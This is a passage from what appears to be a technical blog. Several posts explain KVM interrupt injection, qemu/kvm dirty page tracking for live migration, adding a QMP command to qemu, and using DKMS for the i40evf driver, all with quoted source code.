	rcu_read_lock();
	irq_rt = rcu_dereference(kvm->irq_routing);
	if (irq < irq_rt->nr_rt_entries)
		hlist_for_each_entry(e, &irq_rt->map[irq], link)
			irq_set[i++] = *e;
	rcu_read_unlock();

	while(i--) {
		int r;
		r = irq_set[i].set(&irq_set[i], kvm, irq_source_id, level,
				   line_status);
		if (r < 0)
			continue;

		ret = r + ((ret < 0) ? 0 : ret);
	}

	return ret;
}

First find all the ‘kvm_kernel_irq_routing_entry’ with the same irq and then call the set callback function. As we have seen, this can set can be ‘kvm_set_ioapic_irq’ or ‘kvm_set_pic_irq’. Let’s first talk about the pic situation.

static int kvm_set_pic_irq(struct kvm_kernel_irq_routing_entry *e,
			   struct kvm *kvm, int irq_source_id, int level,
			   bool line_status)
{
#ifdef CONFIG_X86
	struct kvm_pic *pic = pic_irqchip(kvm);
	return kvm_pic_set_irq(pic, e->irqchip.pin, irq_source_id, level);
#else
	return -1;
#endif
}

int kvm_pic_set_irq(struct kvm_pic *s, int irq, int irq_source_id, int level)
{
	int ret, irq_level;

	BUG_ON(irq < 0 || irq >= PIC_NUM_PINS);

	pic_lock(s);
	irq_level = __kvm_irq_line_state(&s->irq_states[irq],
					irq_source_id, level);
	ret = pic_set_irq1(&s->pics[irq >> 3], irq & 7, irq_level);
	pic_update_irq(s);
	trace_kvm_pic_set_irq(irq >> 3, irq & 7, s->pics[irq >> 3].elcr,
			      s->pics[irq >> 3].imr, ret == 0);
	pic_unlock(s);

	return ret;
}

The edge trigger need to call twice of ‘kvm_set_irq’. The first is to trigger the interrupt and the second is to prepare for next time.

In ‘pic_unlock’ it will kick off the vcpu and the cpu can have chance to handle the interrupt.

static void pic_unlock(struct kvm_pic *s)
	__releases(&s->lock)
{
	bool wakeup = s->wakeup_needed;
	struct kvm_vcpu *vcpu, *found = NULL;
	int i;

	s->wakeup_needed = false;

	spin_unlock(&s->lock);

	if (wakeup) {
		kvm_for_each_vcpu(i, vcpu, s->kvm) {
			if (kvm_apic_accept_pic_intr(vcpu)) {
				found = vcpu;
				break;
			}
		}

		if (!found)
			return;

		kvm_make_request(KVM_REQ_EVENT, found);
		kvm_vcpu_kick(found);
	}
}

void kvm_vcpu_kick(struct kvm_vcpu *vcpu)
{
	int me;
	int cpu = vcpu->cpu;
	wait_queue_head_t *wqp;

	wqp = kvm_arch_vcpu_wq(vcpu);
	if (waitqueue_active(wqp)) {
		wake_up_interruptible(wqp);
		++vcpu->stat.halt_wakeup;
	}

	me = get_cpu();
	if (cpu != me && (unsigned)cpu < nr_cpu_ids && cpu_online(cpu))
		if (kvm_arch_vcpu_should_kick(vcpu))
			smp_send_reschedule(cpu);
	put_cpu();
}

static void native_smp_send_reschedule(int cpu)
{
	if (unlikely(cpu_is_offline(cpu))) {
		WARN_ON(1);
		return;
	}
	apic->send_IPI_mask(cpumask_of(cpu), RESCHEDULE_VECTOR);
}

Send an IPI interrupt to the CPU and later the CPU can process the interrupt. Later in ‘vcpu_enter_guest’, it will call ‘inject_pending_event’. In ‘kvm_cpu_has_extint’, the PIC output has been set to 1, so it will call ‘kvm_queue_interrupt’ and ‘kvm_x86_ops->set_irq’. The latter callback is ‘vmx_inject_irq’.

static void vmx_inject_irq(struct kvm_vcpu *vcpu)
{
	struct vcpu_vmx *vmx = to_vmx(vcpu);
	uint32_t intr;
	int irq = vcpu->arch.interrupt.nr;

	trace_kvm_inj_virq(irq);

	++vcpu->stat.irq_injections;
	if (vmx->rmode.vm86_active) {
		int inc_eip = 0;
		if (vcpu->arch.interrupt.soft)
			inc_eip = vcpu->arch.event_exit_inst_len;
		if (kvm_inject_realmode_interrupt(vcpu, irq, inc_eip) != EMULATE_DONE)
			kvm_make_request(KVM_REQ_TRIPLE_FAULT, vcpu);
		return;
	}
	intr = irq | INTR_INFO_VALID_MASK;
	if (vcpu->arch.interrupt.soft) {
		intr |= INTR_TYPE_SOFT_INTR;
		vmcs_write32(VM_ENTRY_INSTRUCTION_LEN,
			     vmx->vcpu.arch.event_exit_inst_len);
	} else
		intr |= INTR_TYPE_EXT_INTR;
	vmcs_write32(VM_ENTRY_INTR_INFO_FIELD, intr);
}

Here we can see the interrupt has been written to the VMCS. Notice in ‘kvm_cpu_get_interrupt’, after the callchain ‘kvm_cpu_get_extint’->’kvm_pic_read_irq’->’pic_intack’. The last function sets the isr and clear the irr. This means the CPU is preparing to process the interrupt(anyway, the cpu will enter guest quickly).

static inline void pic_intack(struct kvm_kpic_state *s, int irq)
{
	s->isr |= 1 << irq;
	/*
	* We don't clear a level sensitive interrupt here
	*/
	if (!(s->elcr & (1 << irq)))
		s->irr &= ~(1 << irq);

	if (s->auto_eoi) {
		if (s->rotate_on_auto_eoi)
			s->priority_add = (irq + 1) & 7;
		pic_clear_isr(s, irq);
	}

}

This is the story of PIC emulation. Now let’s see ‘kvm_set_ioapic_irq’. This function just calls ‘kvm_ioapic_set_irq’. After ‘ioapic_service’->’ioapic_deliver’->’kvm_irq_delivery_to_apic’, we finally delivery the interrupt to lapic. This function tries to find a vcpu to delivery to. Then call ‘kvm_apic_set_irq’ to set the lapic’s irq.

This is the story of interrupt (software) virtualization. As we can see, every interrupt needs VM-exit. This makes a heavy overhead of virtualization. Next time we will see how hardware asistant the interrupt virtualization.

qemu/kvm dirty pages tracking in migration

2018-08-11T00:00:00+00:00

The live migration’s most work is to migrate the RAM of guest from src host to dest host. So the qemu need to track the dirty pages of guest to transfer them to the dest host. This article discusses how qemu do the tracking work.

In a summary, the following steps show the overview of dirty tracking:

qemu allocs a bitmap and set its all bits to 1(mean dirty)
qemu calls kvm to set memory slots with ‘KVM_MEM_LOG_DIRTY_PAGES’ flags
qemu calls kvm to get the kvm dirty bitmap
qemu kvm wrapper: walk the dirty bitmap(from kvm) and fill the dirty bitmap(ram_list)
migration code: walk the ram_list dirty bitmap and set the qemu dirty page bitmap

qemu and kvm create bitmap

In the ram migration setup function, it allocates the qemu bitmap in function ‘ram_save_init_globals’.

{
    ...
    qemu_mutex_lock_iothread();

    qemu_mutex_lock_ramlist();
    rcu_read_lock();
    bytes_transferred = 0;
    reset_ram_globals();

    ram_bitmap_pages = last_ram_offset() >> TARGET_PAGE_BITS;
    migration_bitmap_rcu = g_new0(struct BitmapRcu, 1);
    migration_bitmap_rcu->bmap = bitmap_new(ram_bitmap_pages);
    bitmap_set(migration_bitmap_rcu->bmap, 0, ram_bitmap_pages);

    ...

    /*
    * Count the total number of pages used by ram blocks not including any
    * gaps due to alignment or unplugs.
    */
    migration_dirty_pages = ram_bytes_total() >> TARGET_PAGE_BITS;

    memory_global_dirty_log_start();
    migration_bitmap_sync();
    qemu_mutex_unlock_ramlist();
    qemu_mutex_unlock_iothread();
    rcu_read_unlock();

    return 0;
}

As we can see ‘migration_bitmap_rcu’ is the bitmap for qemu maintains.

Then it calls ‘memory_global_dirty_log_start’:

void memory_global_dirty_log_start(void)
{
    global_dirty_log = true;

    MEMORY_LISTENER_CALL_GLOBAL(log_global_start, Forward);

    /* Refresh DIRTY_LOG_MIGRATION bit.  */
    memory_region_transaction_begin();
    memory_region_update_pending = true;
    memory_region_transaction_commit();
}

This set ‘global_dirty_log’ to true and commit the memory change to kvm (for update).

It then calls ‘address_space_update_topology_pass’ and will call the ‘log_start’ for every MemoryRegionSection.

        if (adding) {
            MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop);
            if (frnew->dirty_log_mask & ~frold->dirty_log_mask) {
                MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start,
                                              frold->dirty_log_mask,
                                              frnew->dirty_log_mask);
            }

For kvm it is ‘kvm_log_start’. We can see in ‘kvm_mem_flags’ it adds the ‘KVM_MEM_LOG_DIRTY_PAGES’ flags.

static int kvm_mem_flags(MemoryRegion *mr)
{
    bool readonly = mr->readonly || memory_region_is_romd(mr);
    int flags = 0;

    if (memory_region_get_dirty_log_mask(mr) != 0) {
        flags |= KVM_MEM_LOG_DIRTY_PAGES;
    }
    if (readonly && kvm_readonly_mem_allowed) {
        flags |= KVM_MEM_READONLY;
    }
    return flags;
}

Following stack backtrack shows the callchains.

(gdb) bt
#0  kvm_set_user_memory_region (kml=0x55ab8fc502c0, slot=0x55ab8fc50500) at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:236
#1  0x000055ab8df10a92 in kvm_slot_update_flags (kml=0x55ab8fc502c0, mem=0x55ab8fc50500, mr=0x55ab8fd36f70)
    at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:376
#2  0x000055ab8df10b1f in kvm_section_update_flags (kml=0x55ab8fc502c0, section=0x7f0ab37fb4c0)
    at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:389
#3  0x000055ab8df10b65 in kvm_log_start (listener=0x55ab8fc502c0, section=0x7f0ab37fb4c0, old=0, new=4)
    at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:404
#4  0x000055ab8df18b33 in address_space_update_topology_pass (as=0x55ab8ea21880 <address_space_memory>, old_view=0x7f0cc4118ca0, 
    new_view=0x7f0aa804d380, adding=true) at /home/liqiang02/qemu0711/qemu-2.8/memory.c:854
#5  0x000055ab8df18d9b in address_space_update_topology (as=0x55ab8ea21880 <address_space_memory>)
    at /home/liqiang02/qemu0711/qemu-2.8/memory.c:886
#6  0x000055ab8df18ed6 in memory_region_transaction_commit () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:926
#7  0x000055ab8df1c9ef in memory_global_dirty_log_start () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:2276
#8  0x000055ab8df30ce6 in ram_save_init_globals () at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1939
#9  0x000055ab8df30d36 in ram_save_setup (f=0x55ab90d874c0, opaque=0x0) at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1960
#10 0x000055ab8df3609a in qemu_savevm_state_begin (f=0x55ab90d874c0, params=0x55ab8ea0178c <current_migration+204>)
    at /home/liqiang02/qemu0711/qemu-2.8/migration/savevm.c:956
#11 0x000055ab8e25d9b8 in migration_thread (opaque=0x55ab8ea016c0 <current_migration>) at migration/migration.c:1829
#12 0x00007f0cda1fd494 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0
#13 0x00007f0cd9f3facf in clone () from /lib/x86_64-linux-gnu/libc.so.6

Here we know the memory topology doesn’t change but only adds the ‘KVM_MEM_LOG_DIRTY_PAGES’.

Now let’s go to the kvm part, as we can see the qemu sends ‘KVM_SET_USER_MEMORY_REGION’ ioctl and the kernel will go to ‘__kvm_set_memory_region’

int __kvm_set_memory_region(struct kvm *kvm,
                const struct kvm_userspace_memory_region *mem)
{

    if (npages) {
        if (!old.npages)
            change = KVM_MR_CREATE;
        else { /* Modify an existing slot. */
            if ((mem->userspace_addr != old.userspace_addr) ||
                (npages != old.npages) ||
                ((new.flags ^ old.flags) & KVM_MEM_READONLY))
                goto out;

            if (base_gfn != old.base_gfn)
                change = KVM_MR_MOVE;
            else if (new.flags != old.flags)
                change = KVM_MR_FLAGS_ONLY;
            else { /* Nothing to change. */
                r = 0;
                goto out;
            }
        }
...

    /* Allocate page dirty bitmap if needed */
    if ((new.flags & KVM_MEM_LOG_DIRTY_PAGES) && !new.dirty_bitmap) {
        if (kvm_create_dirty_bitmap(&new) < 0)
            goto out_free;
    }
...
}

The most important work here is to call ‘kvm_create_dirty_bitmap’ to allocate a bitmap. for every memslot it will allocate memslot->dirty_bitmap in this function. /* * Allocation size is twice as large as the actual dirty bitmap size. * See x86’s kvm_vm_ioctl_get_dirty_log() why this is needed. */ static int kvm_create_dirty_bitmap(struct kvm_memory_slot *memslot) { unsigned long dirty_bytes = 2 * kvm_dirty_bitmap_bytes(memslot);

    memslot->dirty_bitmap = kvm_kvzalloc(dirty_bytes);
    if (!memslot->dirty_bitmap)
        return -ENOMEM;

    return 0;
}

Then goes to ‘kvm_arch_commit_memory_region’ and ‘kvm_mmu_slot_remove_write_access’. Notice, this is not the newest implementation but an old kernel (3.13).

void kvm_mmu_slot_remove_write_access(struct kvm *kvm, int slot)
{
    struct kvm_memory_slot *memslot;
    gfn_t last_gfn;
    int i;

    memslot = id_to_memslot(kvm->memslots, slot);
    last_gfn = memslot->base_gfn + memslot->npages - 1;

    spin_lock(&kvm->mmu_lock);

    for (i = PT_PAGE_TABLE_LEVEL;
        i < PT_PAGE_TABLE_LEVEL + KVM_NR_PAGE_SIZES; ++i) {
        unsigned long *rmapp;
        unsigned long last_index, index;

        rmapp = memslot->arch.rmap[i - PT_PAGE_TABLE_LEVEL];
        last_index = gfn_to_index(last_gfn, memslot->base_gfn, i);

        for (index = 0; index <= last_index; ++index, ++rmapp) {
            if (*rmapp)
                __rmap_write_protect(kvm, rmapp, false);

            if (need_resched() || spin_needbreak(&kvm->mmu_lock)) {
                kvm_flush_remote_tlbs(kvm);
                cond_resched_lock(&kvm->mmu_lock);
            }
        }
    }

    kvm_flush_remote_tlbs(kvm);
    spin_unlock(&kvm->mmu_lock);
}

As the function name implies, it remove write access of this memory slot.

Here we just focus the normal 4k page, not 2M and 1G page. The ‘memslot->arch.rmp’ is a gfn->spte map, say given a gfn we can find the correspoding spte.

static bool __rmap_write_protect(struct kvm *kvm, unsigned long *rmapp,
                bool pt_protect)
{
    u64 *sptep;
    struct rmap_iterator iter;
    bool flush = false;

    for (sptep = rmap_get_first(*rmapp, &iter); sptep;) {
        BUG_ON(!(*sptep & PT_PRESENT_MASK));
        if (spte_write_protect(kvm, sptep, &flush, pt_protect)) {
            sptep = rmap_get_first(*rmapp, &iter);
            continue;
        }

        sptep = rmap_get_next(&iter);
    }

    return flush;
}

static bool
spte_write_protect(struct kvm *kvm, u64 *sptep, bool *flush, bool pt_protect)
{
    u64 spte = *sptep;

    if (!is_writable_pte(spte) &&
        !(pt_protect && spte_is_locklessly_modifiable(spte)))
        return false;

    rmap_printk("rmap_write_protect: spte %p %llx\n", sptep, *sptep);

    if (__drop_large_spte(kvm, sptep)) {
        *flush |= true;
        return true;
    }

    if (pt_protect)
        spte &= ~SPTE_MMU_WRITEABLE;
    spte = spte & ~PT_WRITABLE_MASK;

    *flush |= mmu_spte_update(sptep, spte);
    return false;
}

So here for every gfn, we remove the write access. After return from this ioctl, the guest’s RAM has been marked no write access, every write to this will exit to KVM make the page dirty. This means ‘start the dirty log’.

When the guest write the memory, it will trigger the ept violation vmexit. Then calls ‘tdp_page_fault’. Because this is caused by write protection, the CPU will set the error code to ‘PFERR_WRITE_MASK’ so the ‘fast_page_fault’ and ‘fast_pf_fix_direct_spte’ will be called.

static bool
fast_pf_fix_direct_spte(struct kvm_vcpu *vcpu, u64 *sptep, u64 spte)
{
    struct kvm_mmu_page *sp = page_header(__pa(sptep));
    gfn_t gfn;

    WARN_ON(!sp->role.direct);

    /*
    * The gfn of direct spte is stable since it is calculated
    * by sp->gfn.
    */
    gfn = kvm_mmu_page_get_gfn(sp, sptep - sp->spt);

    if (cmpxchg64(sptep, spte, spte | PT_WRITABLE_MASK) == spte)
        mark_page_dirty(vcpu->kvm, gfn);

    return true;
}

void mark_page_dirty(struct kvm *kvm, gfn_t gfn)
{
    struct kvm_memory_slot *memslot;

    memslot = gfn_to_memslot(kvm, gfn);
    mark_page_dirty_in_slot(kvm, memslot, gfn);
}

void mark_page_dirty_in_slot(struct kvm *kvm, struct kvm_memory_slot *memslot,
                gfn_t gfn)
{
    if (memslot && memslot->dirty_bitmap) {
        unsigned long rel_gfn = gfn - memslot->base_gfn;

        set_bit_le(rel_gfn, memslot->dirty_bitmap);
    }
}

Here we can see, it will set the spte writeable again and set the dirty bitmap.

qemu sync dirty log with kvm

Let’s go back to ‘ram_\save_init_globals’ after telling the kvm to begin start dirty log, it calls ‘migration_bitmap_sync’. This function calls ‘memory_global_dirty_log_sync’ to get the dirty map from kvm. ‘kvm_log_sync’ is used to do this.

static void kvm_log_sync(MemoryListener *listener,
                        MemoryRegionSection *section)
{
    KVMMemoryListener *kml = container_of(listener, KVMMemoryListener, listener);
    int r;

    r = kvm_physical_sync_dirty_bitmap(kml, section);
    if (r < 0) {
        abort();
    }
}

static int kvm_physical_sync_dirty_bitmap(KVMMemoryListener *kml,
                                        MemoryRegionSection *section)
{
    KVMState *s = kvm_state;
    unsigned long size, allocated_size = 0;
    struct kvm_dirty_log d = {};
    KVMSlot *mem;
    int ret = 0;
    hwaddr start_addr = section->offset_within_address_space;
    hwaddr end_addr = start_addr + int128_get64(section->size);

    d.dirty_bitmap = NULL;
    while (start_addr < end_addr) {
        mem = kvm_lookup_overlapping_slot(kml, start_addr, end_addr);
        if (mem == NULL) {
            break;
        }

        ...
        size = ALIGN(((mem->memory_size) >> TARGET_PAGE_BITS),
                    /*HOST_LONG_BITS*/ 64) / 8;
        if (!d.dirty_bitmap) {
            d.dirty_bitmap = g_malloc(size);
        } else if (size > allocated_size) {
            d.dirty_bitmap = g_realloc(d.dirty_bitmap, size);
        }
        allocated_size = size;
        memset(d.dirty_bitmap, 0, allocated_size);

        d.slot = mem->slot | (kml->as_id << 16);
        if (kvm_vm_ioctl(s, KVM_GET_DIRTY_LOG, &d) == -1) {
            DPRINTF("ioctl failed %d\n", errno);
            ret = -1;
            break;
        }

        kvm_get_dirty_pages_log_range(section, d.dirty_bitmap);
        start_addr = mem->start_addr + mem->memory_size;
    }
    g_free(d.dirty_bitmap);

    return ret;
}

Here we can see the qemu sends out a ‘KVM_GET_DIRTY_LOG’ ioctl. In kvm

int kvm_vm_ioctl_get_dirty_log(struct kvm *kvm, struct kvm_dirty_log *log)
{
    int r;
    struct kvm_memory_slot *memslot;
    unsigned long n, i;
    unsigned long *dirty_bitmap;
    unsigned long *dirty_bitmap_buffer;
    bool is_dirty = false;

    mutex_lock(&kvm->slots_lock);

    r = -EINVAL;
    if (log->slot >= KVM_USER_MEM_SLOTS)
        goto out;

    memslot = id_to_memslot(kvm->memslots, log->slot);

    dirty_bitmap = memslot->dirty_bitmap;
    r = -ENOENT;
    if (!dirty_bitmap)
        goto out;

    n = kvm_dirty_bitmap_bytes(memslot);

    dirty_bitmap_buffer = dirty_bitmap + n / sizeof(long);
    memset(dirty_bitmap_buffer, 0, n);

    spin_lock(&kvm->mmu_lock);

    for (i = 0; i < n / sizeof(long); i++) {
        unsigned long mask;
        gfn_t offset;

        if (!dirty_bitmap[i])
            continue;

        is_dirty = true;

        mask = xchg(&dirty_bitmap[i], 0);
        dirty_bitmap_buffer[i] = mask;

        offset = i * BITS_PER_LONG;
        kvm_mmu_write_protect_pt_masked(kvm, memslot, offset, mask);
    }
    if (is_dirty)
        kvm_flush_remote_tlbs(kvm);

    spin_unlock(&kvm->mmu_lock);

    r = -EFAULT;
    if (copy_to_user(log->dirty_bitmap, dirty_bitmap_buffer, n))
        goto out;

    r = 0;
out:
    mutex_unlock(&kvm->slots_lock);
    return r;
}

It copys the dirty bitmap to userspace and also set the spte to write protection using ‘kvm_mmu_write_protect_pt_masked’.

void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
                    struct kvm_memory_slot *slot,
                    gfn_t gfn_offset, unsigned long mask)
{
    unsigned long *rmapp;

    while (mask) {
        rmapp = __gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                    PT_PAGE_TABLE_LEVEL, slot);
        __rmap_write_protect(kvm, rmapp, false);

        /* clear the first set bit */
        mask &= mask - 1;
    }
}

So next time, the guest write to this pfn page, it will mark as a dirty page again.

kvm_get_dirty_pages_log_range–>cpu_physical_memory_set_dirty_lebitmap.

In the later function, it sets ‘ram_list.dirty_memory[i])->blocks’ dirty bitmap. This dirty bitmap lays in ‘ram_list’, not with the migration.

qemu copy dirty bitmap to migration bitmap

In ‘migration_bitmap_sync’ after the call of ‘memory_global_dirty_log_sync’, ‘migration_bitmap_sync_range’ will be called for every block. This calls copy ‘ram_list’s dirty bitmap to ‘migration_bitmap_rcu->bmap’.

static void migration_bitmap_sync_range(ram_addr_t start, ram_addr_t length)
{
    unsigned long *bitmap;
    bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
    migration_dirty_pages +=
        cpu_physical_memory_sync_dirty_bitmap(bitmap, start, length);
}


static inline
uint64_t cpu_physical_memory_sync_dirty_bitmap(unsigned long *dest,
                                            ram_addr_t start,
                                            ram_addr_t length)
{
    ram_addr_t addr;
    unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS);
    uint64_t num_dirty = 0;

    /* start address is aligned at the start of a word? */
    if (((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) {
       ...
        src = atomic_rcu_read(
                &ram_list.dirty_memory[DIRTY_MEMORY_MIGRATION])->blocks;

        for (k = page; k < page + nr; k++) {
            if (src[idx][offset]) {
                unsigned long bits = atomic_xchg(&src[idx][offset], 0);
                unsigned long new_dirty;
                new_dirty = ~dest[k];
                dest[k] |= bits;
                new_dirty &= bits;
                num_dirty += ctpopl(new_dirty);
            }
   ...

    return num_dirty;
}

Now, the ‘migration_bitmap_rcu->bmap’ know all the dirty pages. Of course it is not very useful for the setup process, as qemu already set all of ‘migration_bitmap_rcu->bmap’ to 1.

find the dirty pages and send out

After the setup, we go to the most important process, iterate send pages to the dest and after a water mark reached, stop the machine and send the other all dirty pages to dest. The overview can short as following.

while (s->state == MIGRATION_STATUS_ACTIVE ||
        s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
        ...

        if (!qemu_file_rate_limit(s->to_dst_file)) {
            uint64_t pend_post, pend_nonpost;

            qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
                                    &pend_post);
            ...
            if (pending_size && pending_size >= max_size) {
                /* Still a significant amount to transfer */

                if (migrate_postcopy_ram() &&
                    s->state != MIGRATION_STATUS_POSTCOPY_ACTIVE &&
                    pend_nonpost <= max_size &&
                    atomic_read(&s->start_postcopy)) {

                    if (!postcopy_start(s, &old_vm_running)) {
                        current_active_state = MIGRATION_STATUS_POSTCOPY_ACTIVE;
                        entered_postcopy = true;
                    }

                    continue;
                }
                /* Just another iteration step */
                qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
            } else {
                trace_migration_thread_low_pending(pending_size);
                migration_completion(s, current_active_state,
                                    &old_vm_running, &start_time);
                break;
            }
        }
    }

Here show the three most important function. ‘qemu_savevm_state_pending’, ‘qemu_savevm_state_iterate’ and ‘migration_completion’. For ram, the save pending function is ‘ram_save_pending’.

static void ram_save_pending(QEMUFile *f, void *opaque, uint64_t max_size,
                            uint64_t *non_postcopiable_pending,
                            uint64_t *postcopiable_pending)
{
    uint64_t remaining_size;

    remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;

    if (!migration_in_postcopy(migrate_get_current()) &&
        remaining_size < max_size) {
        qemu_mutex_lock_iothread();
        rcu_read_lock();
        migration_bitmap_sync();
        rcu_read_unlock();
        qemu_mutex_unlock_iothread();
        remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
    }

    /* We can do postcopy, and all the data is postcopiable */
    *postcopiable_pending += remaining_size;
}

This function calls ‘migration_bitmap_sync’ to get the dirty page bitmap in ‘migration_bitmap_rcu->bmap’. In the iterate function ‘ram_save_iterate’ it calls ‘ram_find_and_save_block’ to find the dirty page and then send out to the dest host.

static int ram_save_iterate(QEMUFile *f, void *opaque)
{
    int ret;
    int i;
    int64_t t0;
    int done = 0;

    rcu_read_lock();
    if (ram_list.version != last_version) {
        reset_ram_globals();
    }

    /* Read version before ram_list.blocks */
    smp_rmb();

    ram_control_before_iterate(f, RAM_CONTROL_ROUND);

    t0 = qemu_clock_get_ns(QEMU_CLOCK_REALTIME);
    i = 0;
    while ((ret = qemu_file_rate_limit(f)) == 0) {
        int pages;

        pages = ram_find_and_save_block(f, false, &bytes_transferred);
        /* no more pages to sent */
        if (pages == 0) {
            done = 1;
            break;
        }
        acct_info.iterations++;

        /* we want to check in the 1st loop, just in case it was the 1st time
        and we had to sync the dirty bitmap.
        qemu_get_clock_ns() is a bit expensive, so we only check each some
        iterations
        */
        if ((i & 63) == 0) {
            uint64_t t1 = (qemu_clock_get_ns(QEMU_CLOCK_REALTIME) - t0) / 1000000;
            if (t1 > MAX_WAIT) {
                DPRINTF("big wait: %" PRIu64 " milliseconds, %d iterations\n",
                        t1, i);
                break;
            }
        }
        i++;
    }
   ...

    return done;
}

‘ram_find_and_save_block–>get_queued_page’:

static bool get_queued_page(MigrationState *ms, PageSearchStatus *pss,
                            ram_addr_t *ram_addr_abs)
{
    RAMBlock  *block;
    ram_addr_t offset;
    bool dirty;

    do {
        block = unqueue_page(ms, &offset, ram_addr_abs);
        /*
        * We're sending this page, and since it's postcopy nothing else
        * will dirty it, and we must make sure it doesn't get sent again
        * even if this queue request was received after the background
        * search already sent it.
        */
        if (block) {
            unsigned long *bitmap;
            bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
            dirty = test_bit(*ram_addr_abs >> TARGET_PAGE_BITS, bitmap);
            if (!dirty) {
                trace_get_queued_page_not_dirty(
                    block->idstr, (uint64_t)offset,
                    (uint64_t)*ram_addr_abs,
                    test_bit(*ram_addr_abs >> TARGET_PAGE_BITS,
                        atomic_rcu_read(&migration_bitmap_rcu)->unsentmap));
            } else {
                trace_get_queued_page(block->idstr,
                                    (uint64_t)offset,
                                    (uint64_t)*ram_addr_abs);
            }
        }

    } while (block && !dirty);

    if (block) {
        /*
        * As soon as we start servicing pages out of order, then we have
        * to kill the bulk stage, since the bulk stage assumes
        * in (migration_bitmap_find_and_reset_dirty) that every page is
        * dirty, that's no longer true.
        */
        ram_bulk_stage = false;

        /*
        * We want the background search to continue from the queued page
        * since the guest is likely to want other pages near to the page
        * it just requested.
        */
        pss->block = block;
        pss->offset = offset;
    }

    return !!block;
}

In this function we find the dirty page in bitmap.

The following shows the process of dirty bitmap tracking.

+-------------+          +----------+       +--------------+          +---------------------+
|             |          | ram_list +-----> | dirty_memory +--------> | migration_bitmap_rcu|
|             |          +----------+       +------+-------+          +---------------------+
| Guest       |                                    ^
|             |                                    |
|             |                                    |
|             |                                    |
|             +--------------------------------+   |
|             |                                |   |
|             |                                |   |
|             |                                |   |
|             |                                v   |
|             |                                    |
|             |          +---------+       +-------+--------+
|             |          | memslot +-----> | dirty_bitmap   |
+-------------+          +---------+       +----------------+

Add a new qmp command for qemu

2018-07-25T00:00:00+00:00

There is a detail documentation for writing a new qmp command for qemu, I just make a note for this. As the documnetation said, to create a new qmp command needs the following four steps:

Define the command and any types it needs in the appropriate QAPI schema module.
Write the QMP command itself, which is a regular C function. Preferably, the command should be exported by some QEMU subsystem. But it can also be added to the qmp.c file
At this point the command can be tested under the QMP protocol
Write the HMP command equivalent. This is not required and should only be done if it does make sense to have the functionality in HMP. The HMP command is implemented in terms of the QMP command

The first step is to add the command in qapi-schema.json file. Add following command to the last of the file:

{ 'command': 'qmp-test', 'data': {'value': 'int'} }

Second, add the QMP processing function, add following function to qmp.c file:

unsigned int test_a = 0;

void qmp_qmp_test(int64_t value, Error **errp)
{
	if (value > 100 || value < 0)
	{
		error_setg(errp, QERR_INVALID_PARAMETER_VALUE, "value a", "not valid");
		return;
	}
	test_a = value;
}

At this time, we can send qmp command to qemu.

{"execute":"qmp-test","arguments":{"value":80}}

Also we often want to send more human readable command, so we can add hmp command.

Add following to hmp-commands.hx in the middle of it:

{
		.name       = "qmp-test",
		.args_type  = "value:i",
		.params     = "value",
		.help       = "set test a.",
		.cmd        = hmp_qmp_test,
	},

STEXI
@item qmp-test  @var{value}
Set test a to @var{value}.
ETEXI

Add following to last of hmp.c file:

void hmp_qmp_test(Monitor *mon, const QDict *qdict)
{
	int64_t value = qdict_get_int(qdict, "value");
	qmp_qmp_test(value, NULL);
}

Add following to last of hmp.h file:

void hmp_qmp_test(Monitor *mon, const QDict *qdict);

After compile the qemu, we can use ‘qmp-test 80’ command in the monitor.

dkms 101

2018-07-14T00:00:00+00:00

Loadable kernel module is very useful for dynamically adding functionality to the running kernel. As the free of Linux, we can often update/install new kernel easily. For some distributions, every time we install a new kernel, we need to compile the loadable module at the same time. This is very boring and in sometimes it can do some harmness. This is the Dynamic Kernel Module Support (DKMS) can play a role. DKMS is a program/framework that enables generating Linux kernel modules whose sources generally reside outside the kernel source tree. And the DKMS modules will be automatically rebuilt when a new kernel is installed.

This article will just focus how to use the dkms but not include the internals of it.

Let’s use the x710 network card VF driver as an example.

No DKMS

Firstly, Let’s see the system self-contained i40evf driver.

Here it has a low version of driver. We mannually override it with a more newer version.

It works, now let’s update the dist, this also updates the kernel.

	apt-get dist-upgrade

Look at the i40evf again, it rolls back to the lower version again. If we want to use the high version i40evf, we need to compile it again.

With DKMS

Firstly, we need move the source file into the /usr/src directory. For example

/usr/src/i40evf-3.4.2

Notice here i40evf-3.4.2 directory is the src directory in i40evf-3.4.2.tar.gz.

In this directory we need create a file named dkms.conf. Following is the file content.

	root@debian91:/usr/src/i40evf-3.4.2# cat dkms.conf 
	PACKAGE_NAME="i40evf"
	PACKAGE_VERSION="3.4.2"
	CLEAN="make clean"
	BUILT_MODULE_NAME[0]="i40evf"
	DEST_MODULE_LOCATION[0]="/updates"
	AUTOINSTALL="yes"

Then install the dkms package.

	apt-get install dkms

Don’t forget install the linux headers package to build the module.

Now the i40evf has been updated to 3.4.2.

Updates the dist and reboot.

Notice the md5 checksum, we can make sure the i40evf module has been automatically rebuilt.

Also we ‘dkms status’ can show the dkms module installed.

	root@debian91:~# dkms status
	i40evf, 3.4.2, 4.9.0-3-amd64, x86_64: installed
	i40evf, 3.4.2, 4.9.0-6-amd64, x86_64: installed

Linux kernel networking: a general introduction

2018-06-17T00:00:00+00:00

